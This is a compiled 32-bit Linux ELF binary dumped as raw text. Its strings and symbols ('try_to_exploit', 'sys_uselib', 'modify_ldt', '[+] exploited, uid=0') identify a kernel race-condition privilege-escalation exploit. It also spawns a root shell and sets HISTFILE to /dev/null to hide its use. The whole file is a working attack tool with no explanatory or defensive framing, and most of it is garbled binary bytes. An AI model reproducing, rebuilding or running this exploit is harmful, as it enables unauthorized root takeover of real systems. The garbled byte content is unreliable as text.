ELF4DT4 (# 444//0(U|0|| /lib/ld-linux.so.2GNU%0$#/.+% "-')*,  !& (26V$4WqD|T*dCtqw!Z6dĉԉ6 YW> 4: !C.$$B4W DTI)djQt6+a 8 x6<ĊQkԊ|/q9 !|+$14hDT2J(d:J libc.so.6waitpidpausestdoutstrerrorfgetsmemcpyexeclgetuidmallocoptargsysinfomodify_ldtfflushlseekwritefprintfkillumasksignalsetpgrpunlinkforksscanfsetresuidstrdupgetoptmemsetgetppidstrcmpfclose__errno_locationfopenatoifileno_IO_stdin_used_exit__libc_start_mainstrlenclone__environ__xstat__gmon_start__GLIBC_2.1GLIBC_2.0iiYiic/ $(,dhlptx|    ıȱ̱б Ա!ر"ܱ#%&'()*+.U$/ 5\%`%dh%hh%lh%ph%th %xh(%|h0%h8p%h@`%hHP%hP@%hX0%h` %hh%hp%hx%h%h%h%h%h%h%h%hp%ıh`%ȱhP%̱h@%бh0%Աh %رh%ܱh%h%h%h%h%h%h %h(%h01^PTRhhpQVhoUS[ë%RtX[ÐU=,u-tҡu,ÉUTt!t hTs&ÐUWVS ]M Uu}EUŸ̀]E}v|‹E؉EE [^_]UWVS ]M Uu}̀E}v4‹E؉EE [^_]US]M ÙE}v‹E؉EE[]US}]M ÙE}v‹E؉EE[]US{]M ÙE}vx‹E؉EE[]USN]M ̀E}v=‹E؉EE[]US[]M ̀E}v‹E؉EE[]USV]̀E}v‹E؉EE[]ÙE}v‹E؉EUM E)ЉEUЍЍЍЍЍEM EPA)ЉEEU} u=Xt EE EEE8uuhک5$T/ 0Puh5$#} t h = hA- 5$, 5d+j 5ujUHDuIjhhhRT=duT 9s묡djh5|@@tlzjh0PA@@2@y78 =xpDuH@H$Ph5@@tjhCjjj2jh0P @@ujhLl5hhW. 5$- jU@@]UEE;r9EsEEU E0tq E 0tZE;E uME;Eu@E EEU;u)E;wE;w EEEUSEEE;u2E;u"E;uE ;uE빋]MUE ]MUEE9ErG5 5ut!U-UE몋]U`Žڸ!Pa]U@]UP@PjhmUSuhs 5$ 5d$PhuEEtjh{EEh˓j 6EEE=t7EPh 5$jhU%U%EPEPh 5$EEEEEEEE$PhuEEtjhD @t%@=izu< h@=izt# h 5$. h 5$ jjjnjjjjjjh5hjh"L]U-;wxL@U%Lt!$¡$jh5hU`=`uH$=`uzjjhxx|jhxjtjh(H=`tH9~^$8tt>=tu+t  -P t뒃jhd%UEh3h5E}ujh`uhhuhhJuX hhhhhhhhh0uhl uP uW=u)ЉEEEU-h$$jjj2$Ph5; E}ujhUUL@LUP@PjEPjU$U$t%%#hqj @UEHPE@jh EPhя=ujhHtH=\u! hAM 5$L h E}u +EjhD 5d>ED}tjhHth@5E}tjhPt=\ulE?ubEE}yE?EEUU}yEEU)‰lPh 5$El)P5E}tjhh5E}tjh jhUjh>hhT(ЍЍЍЍЍЉT9w$$u! h) 5$$Ph0PE}ujh<-PEjh0P~E}tjhId jjuh0P E}u(}ujhQ!E(uE 5 5h 5$hKjh3j vh3jdjhuUx j( 5dGhhB5d\E}yjhj4jEP^jhEPfEfEfE fEE4j4EPu%j jEPEEEEE@Ej EPujhuNhhhhhu uUx!-@)P5E}tjh-P=lt l"@!Уl5l55h 5$EPh7u7E@!УE¸!У hc=pt;pv p=7v h`g?!У=w;r 55h)   P$=$ujh­ Pj5$ 9UE ,jjj"jh@j E}ujhѭYE?%e.UP@P]UEE%-?!УlE=luEE} hE}E$$-jjj2$Ph5 E}ua}uVE%u@}u hAu@Phݭ 5$E/u@Phݭ 5$j  PS{Uhj  ht 5$sP@@@&=u.Pt h=jj Uuh h  h2 hH h] hr h hr hb hAR jU)ă}uhծu uE}yEaE}xU,X\뚃 5(!d낃h h5(u =wQjh:hph5(tjhh!p 5((=(jh# 5(ed 5(Jhhlh5(tjh!lF E 0v1qÐUVS1`-9sƐC9r[^]U-SXuX[]KuX[]wUSE #i$D$ED$([]Ë$ÐUSRDDtЋuX[]US[PjY[TERM=vt100HISTFILE=/dev/null/dev/shm/_elf_lib/bin/bash [-] FAILED: %s [-] FAILED: %s (%s) CRITICAL, entering endless loop mprotectmmap2 race [+] race won maps=%dlcall [!] try to exploit 0x%.8xmprotect 1 [-] FAILED val = 0x%.8xfind LDT [+] gate modified ( 0x%.8x 0x%.8x )mprotect 2 [+] exploited, uid=0 [-] uid change failedshexeclmodify_ldtr/proc/slabinfoget_slab_objs: /proc/slabinfo not readable?%s %u %u %u %u %u %utry again (-f switch) and againclonevm_area_structuselibmunmap lib Wait... %cmunmap 1munmap 2 VMAs reversedmprotect brkmadvisemremap: expand VMA expanded VMA (0x%.8x-0x%.8x)try againopen lib (/dev/shm/_elf_lib not writable?)ELFunmap stack [+] moved stack %x, task_size=0x%.8x, map_base=0x%.8x/proc/kcore lot of RAM, consider -r switch [+] vmalloc area 0x%.8x - 0x%.8xmalloc pagemapmmap2 stack child %d VMAs %d [+] SLAB cleanup Usage: %s -f forced stop -s silent mode -r mem limit bytes -c command to run -n SMP iterations -d race delta usecs -w kswapd wait seconds -l alternate lib name -a alternate addr hex n:l:a:w:c:d:r:fsh%ubad delta valuebad ram limitbad wait value%xbad addr value9ܧ9ͦ999999999E٦999PIntelectual property of IhaQueRЩ-\|/-\|/ ܈P( m X8 oToo| *:JZjzʉډ *:JZjzʊڊ *:JZjGCC: (GNU) 3.3 20030226 (prerelease) (SuSE Linux)GCC: (GNU) 3.3 20030226 (prerelease) (SuSE Linux)GCC: (GNU) 3.3 20030226 (prerelease) (SuSE Linux)GCC: (GNU) 3.3 20030226 (prerelease) (SuSE Linux)GCC: (GNU) 3.3 20030226 (prerelease) (SuSE Linux)GCC: (GNU) 3.3 20030226 (prerelease) (SuSE Linux)GCC: (GNU) 3.3 20030226 (prerelease) (SuSE Linux)GCC: (GNU) 3.3 20030226 (prerelease) (SuSE Linux),P܈ #pi 2$f!_IO_stdin_used6!\__libc_csu_init__libc_csu_fini \__stat50u"B,#T$0G%qpa(+)B*+T,int-0)23k>9: 00qW00aA$#uP~a/q\0 a0Iaja}aRaytq.qCh x >0 aEa b0 N 8L M$IO6I#N#O$y V#8I#WT#!h#8"I#s#&-3Yg 8i5H RR7 X7<?u#v#x#Az# {#}#K~##$# M#$#(#,m#0#4q#8 =$@b#### #%#8I###  B  B %K RB@N $RO/ 5AR_XL RR7] a    d  $$ e5 ;G"B#jA#k#l*#qm# n# G]  I%#;R#q#= .,42#q3=# M,5 / 4 Q5.789T:0Z/tmp/ccpQSO9i.s/usr/src/packages/BUILD/glibc-2.3.2/csuGNU AS 2.13.90.0.189٨p50intBuaEU,pU@ iA7S 7J٨U iL7S      I50u"B,#T$0G%qpa(+)B*+T,int-0)23k>9: 00qW00aA$#uP~a/q\0 a0Iaja}aRaytq.qCh x >0L wx#&ya#, 17*?@DKJVRxZFb; oX%& #'T#0)*# -@#.K#/#0#1 # 2T#(z4V#,8;#0;F#4F#87G#@H#HpUq#P?Vq#T \`^_ #`0#.b*# c@#dK#e#f#g # h0#(zih#0j;#4lQ#8t#@7u#Hv#P05#X !U  Pbuf P  tZ/tmp/ccVBVKAd.s/usr/src/packages/BUILD/glibc-2.3.2/csuGNU AS 2.13.90.0.18% : ; I$ > $ >  : ; : ; I8 I!I/  I : ;I  : ; : ; I : ; ( ' II : ; &I'  < !I4: ; I?  %% : ; I$ > $ > : ;I.? : ; ' @  U4: ; I 4: ; I &I I !'  I4: ; I? < % : ; I$ > $ >  : ; : ; I8 I!I/  I  : ; .? : ; ' I@ : ; I : ; I &I% init.c/usr/lib/gcc-lib/i486-suse-linux/3.3/include/stddef.h../sysdeps/generic/bits/types.h../wcsmbs/wchar.h../sysdeps/gnu/_G_config.h../iconv/gconv.hn# /tmp/ccpQSO9i.sP,Wd܈9,:!,Wdd,,-W elf-init.c/usr/lib/gcc-lib/i486-suse-linux/3.3/include/stddef.hp+Uz+[:pYK-7Ju| stat.c/usr/lib/gcc-lib/i486-suse-linux/3.3/include/stddef.h../sysdeps/generic/bits/types.h../time/time.h../io/sys/stat.h../sysdeps/unix/sysv/linux/bits/stat.h r8dK# /tmp/ccVBVKAd.sf(| p0ABB9ALG| P2ABD_G_int32_t__time_t__GCONV_INCOMPLETE_INPUT__GCONV_OK__state__gconv_init_fct_G_iconv_t__rlim64_t__GCONV_ILLEGAL_DESCRIPTOR__gconv_infoshort unsigned intunsigned char__useconds_t__counter__fct__val__value__nsteps_G_int16_t__max_needed_from__gconv_btowc_fct__off_t__ssize_t__statep__fsfilcnt_t__steps__fsfilcnt64_t__blkcnt_t__gconv_loaded_object_G_fpos64_t__gconv_t__trans_end_fct__u_int__GCONV_ILLEGAL_INPUT__blksize_t__to_name__uint64_t__id_t__GCONV_EMPTY_INPUT__cd__ino_t__GCONV_NOCONV__invocation_counter__pid_t__u_short__count__quad_t__u_long__fsid_t__GCONV_FULL_OUTPUT__max_needed_to__timer_t__stateful__uint32_t/usr/src/packages/BUILD/glibc-2.3.2/csu__key_t__u_char__gconv_step__shlib_handle__min_needed_toshort int__dev_tlong long int__gconv_trans_dataGNU C 3.3 20030226 (prerelease) (SuSE Linux)__outbuflong long unsigned int__uid_t__wchb__uint16_twint_t__u_quad_t__gconv_trans_end_fct__flags__outbufend__combined__gconv_trans_init_fct__init_fct__modname__trans_context_fct__trans_fct__rlim_t__wch__intptr_t__suseconds_t__ino64_twchar_t__GCONV_IS_LAST__blkcnt64_t__fsblkcnt64_t__mode_t__qaddr_t__pos__gconv_end_fct_IO_stdin_used__internal_use__GCONV_NODB__clock_t__gconv_step_data__gconv_trans_query_fct__socklen_t__int64_t__GCONV_NOMEM__off64_t__btowc_fct_G_fpos_t__int8_t__daddr_t__fsblkcnt_t_G_uint32_t__nlink_t__swblk_t__GCONV_INTERNAL_ERROR__mbstate_t__gid_t__clockid_t__int32_t__gconv_trans_context_fct__next__GCONV_IGNORE_ERRORS__end_fct__trans__uint8_t__gconv_fct__from_name__min_needed_from__gconv_trans_fct__data__caddr_t_G_uint16_t__loff_t__int16_t__libc_csu_finiptrdiff_t__init_array_end__init_array_startelf-init.c__fini_array_end__libc_csu_init__fini_array_startst_ctimtv_nsec__st_inost_mtim__unused5/usr/src/packages/BUILD/glibc-2.3.2/io__unused4st_sizest_rdevst_gidst_blocksstat64__pad1__pad2st_nlinkst_blksizetimespec__statst_uidtv_secst_modestat.cst_atimst_devfile0.symtab.strtab.shstrtab.interp.note.ABI-tag.hash.dynsym.dynstr.gnu.version.gnu.version_r.rel.dyn.rel.plt.init.text.fini.rodata.data.eh_frame.dynamic.ctors.dtors.jcr.got.bss.comment.debug_aranges.debug_pubnames.debug_info.debug_abbrev.debug_line.debug_frame.debug_str.debug_ranges# 1((\7 ?mGo`ToTT0c  l 8 u܈p{ PP)) 0x xx0||0DD1LL1TT1XX1  2S  23P4|4D|GlJ 0J+R S9Y "i f(T ܈   Px|DLTX  !" #.D<LJTW[,gЋ } #HPxT  @DHLPT $X\` d((.h8lApK, Q@!Zdbhlquy}  $tx l @"@'29˓% CǙl Pa p̚ zV$ז[ |4Wq D|T*dC 8  tq)0!CZS6dvĉԉ62 Ѝ; W> 9  4! !4܈ :3 B L Uˠo dv.$l_ 2` $4WC- ܎ D TIdj-t6@RD b? ja{ p0 o   1   6.ĊQ@ی> LPRԊ|cqu l |> DO +2" $1:e  X"('4h9DJK& Q; bH mT2~(d:я % 5 pl   init.cinitfini.ccall_gmon_startcrtstuff.c__CTOR_LIST____DTOR_LIST____JCR_LIST__p.0completed.1__do_global_dtors_auxframe_dummy__CTOR_END____DTOR_END____FRAME_END____JCR_END____do_global_ctors_auxelflbl.cvalgofinishscntccntdeltadelta_maxmap_flagsfstopsilentpnumsmp_maxwtimemap_countmap_baseram_limitmyenvhellc0delibnameshellnamecpidtm2tm1smplib_addrmap_addrtask_sizeaddr_minuidvma_endvma_startkcodeold_esppidxpagemapnpg.0l.1max_pageaddr_maxc.2d.3u.4a.5namelinesmiley.6cstacktmpbuf.7si.8elf-init.cstat.csigfailedprepare_slabclone@@GLIBC_2.0try_to_exploitexploitmeexecl@@GLIBC_2.0setpgrp@@GLIBC_2.0scan_mm_finish_DYNAMICstrdup@@GLIBC_2.0vreversedwrite@@GLIBC_2.0fileno@@GLIBC_2.0strcmp@@GLIBC_2.0sys_uselibusageclose@@GLIBC_2.0_fp_hwfprintf@@GLIBC_2.0fork@@GLIBC_2.0umask@@GLIBC_2.0signal@@GLIBC_2.0fflush@@GLIBC_2.0unlink@@GLIBC_2.0__fini_array_end__statsys_munmapstrerror@@GLIBC_2.0__dso_handlemodify_ldt__libc_csu_finikernel_code__errno_location@@GLIBC_2.0environ@@GLIBC_2.0_initsegvcntwipe_slabcallme_2prepare_finishmalloc@@GLIBC_2.0getppid@@GLIBC_2.0setresuid@@GLIBC_2.0make_libscan_mm_startstdout@@GLIBC_2.0__xstat@@GLIBC_2.0sys_sched_yieldfatalwaitpid@@GLIBC_2.0_startgetopt@@GLIBC_2.0fgets@@GLIBC_2.0sysinfo@@GLIBC_2.0strlen@@GLIBC_2.0check_vma_flagsscan_mmpause@@GLIBC_2.0__fini_array_startvalidate_vma__libc_csu_init__bss_startmainchldcnt__libc_start_main@@GLIBC_2.0__init_array_endvalid_ptr__environ@@GLIBC_2.0data_startprintf@@GLIBC_2.0getuid@@GLIBC_2.0sys_madvise_finilseek@@GLIBC_2.0memcpy@@GLIBC_2.0fclose@@GLIBC_2.1callme_1do_wipeopen@@GLIBC_2.0sys_mprotectsys_mmap2atoi@@GLIBC_2.0statsscanf@@GLIBC_2.0_edataprepare__i686.get_pc_thunk.bx_GLOBAL_OFFSET_TABLE__endmemset@@GLIBC_2.0_exit@@GLIBC_2.0reapersys_gettimeofdaysys_mremapfopen@@GLIBC_2.1__init_array_startoptarg@@GLIBC_2.0_IO_stdin_usedkill@@GLIBC_2.0raceme__data_start__kcodeget_slab_objstmdiff_Jv_RegisterClasses__gmon_start__